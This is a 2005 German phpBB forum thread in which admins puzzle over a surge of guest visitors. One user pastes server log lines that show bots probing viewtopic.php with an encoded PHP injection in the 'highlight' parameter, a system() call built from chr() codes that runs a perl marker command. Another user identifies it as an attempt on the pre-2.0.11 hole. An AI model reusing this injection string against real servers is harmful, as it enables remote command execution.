Seite 5 von 7
Verfasst: 18.02.2005 12:41
von stei109
larsneo hat geschrieben:
spass beiseite: wie soll man gastzugriffe von bots unterbinden solange es kein definiertes merkmal gibt, dass sie von normalen gastzugriffen (die in aller regel ja wohl erlaubt sein sollen) unterscheidet?
Hi!
Kann man wohl nicht unterbinden, aber warum sollen Gastzugriffe in aller Regel erlaubt sein ?
Hatte ich bis dato auch, aber ich lass mir mein Forum nicht zuspammen und mißbrauchen - also bleibt nur mehr der weg über die Registrierung.
Das hält solche Idioten fürs erste ab.
Verfasst: 18.02.2005 12:49
von niffi
larsneo hat geschrieben:ich sagte logfiles (und nichts statistik)
erklär' mir aber bitte aber auch noch einmal genau, was du eigentlich erreichen willst.
also: mein websitecounterzeigt an das in etwa 10 minuten ca. 20 leute zugegriffen haben, in der gleichen zeit schwankt aber die zahl der gäste im forum zwischen 30 und 70 (!) und das ständig. ist aber erst seid 2 tagen so. gut ich hatte vorher "acid´s whos online" hack nicht drauf, aber selbst wenn ich die seite in den zustand davor zurückversetze, tritt der fehler auf.
ist einfach unwahrscheinlich das pötzlich 40 oder 50 gäste städnig online sind, wo frühr max. mit regUsern nur 20 da waren.
Und wenn ich als Admin mir die IPs ansehe, sind auch einige doppelt (meist taucht die gleiche IP 2 oder 3 mal auf)...
Verfasst: 18.02.2005 13:37
von DocSnyder
Ich habe jetzt logfiles. Leider kann ich damit nicht soviel anfangen.
Aber komisch siehts aus
Code: Alles auswählen
216.55.xxx.xx - - [18/Feb/2005:13:11:01 +0100] "GET
/viewtopic.php?t=2769&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252
Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(3
4)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr
(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%
252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0"
302 - "-" "Mozilla/4.0"
212.18.xx.x - - [18/Feb/2005:13:11:03 +0100] "GET
/viewtopic.php?t=2739&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252
Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(3
4)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr
(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%
252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200
86202 "-" "Mozilla/4.0"
212.18.xx.xxx - - [18/Feb/2005:13:11:16 +0100] "GET
/viewtopic.php?p=125048&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%2
52Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr
(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Ec
hr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111
)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0"
200 87382 "-" "Mozilla/4.0"
Verfasst: 18.02.2005 14:27
von niffi
ja hilft mir leider nicht richtig weiter....
Verfasst: 18.02.2005 14:28
von 701
habe seit ca. 7 Uhr auch massives "Gastaufkommen" wobei die stosszeiten bei 81 Usern lag, jedoch keine schäden oder minderung der Serverleistung.
Verfasst: 18.02.2005 16:00
von larsneo
ist der versuch, die pre-2.0.11 schwachstelle auszunutzen. bei aktuellen boards passiert dadurch definitiv nichts. als zusätzlichen schutz vor traffic habe ich
*hier* schon vor geraumer zeit eine .htaccess gepostet.
Verfasst: 18.02.2005 16:14
von niffi
so, 16:14 Uhr -> seit etwa 30 min hat sich es bei mir wieder eingepegelt auf 8-10 Gäste.... ist bei mir normal.
wer weiß was da loswar......
was soll das ändern der .htaccess bringen?
@701: ich hab heute mit 78 Usern auch nen neuen rekord aufgestellt....
Verfasst: 18.02.2005 16:18
von stei109
Was da genau abläuft, weiß ich auch nicht (hätte den Link im betreffenden Posting doch speichern sollen.)
Fakt ist, dass genau auf den Forumseintrag verlinkt wird und das die "Besucher" dorthin zieht.
Was das soll, weiß ich auch nicht
Verfasst: 18.02.2005 16:19
von larsneo
niffi hat geschrieben:was soll das ändern der .htaccess bringen?
larsneo hat geschrieben:als zusätzlichen schutz vor traffic[...]
Verfasst: 18.02.2005 16:19
von niffi
den link zu finden, sollte eine herausforderung sein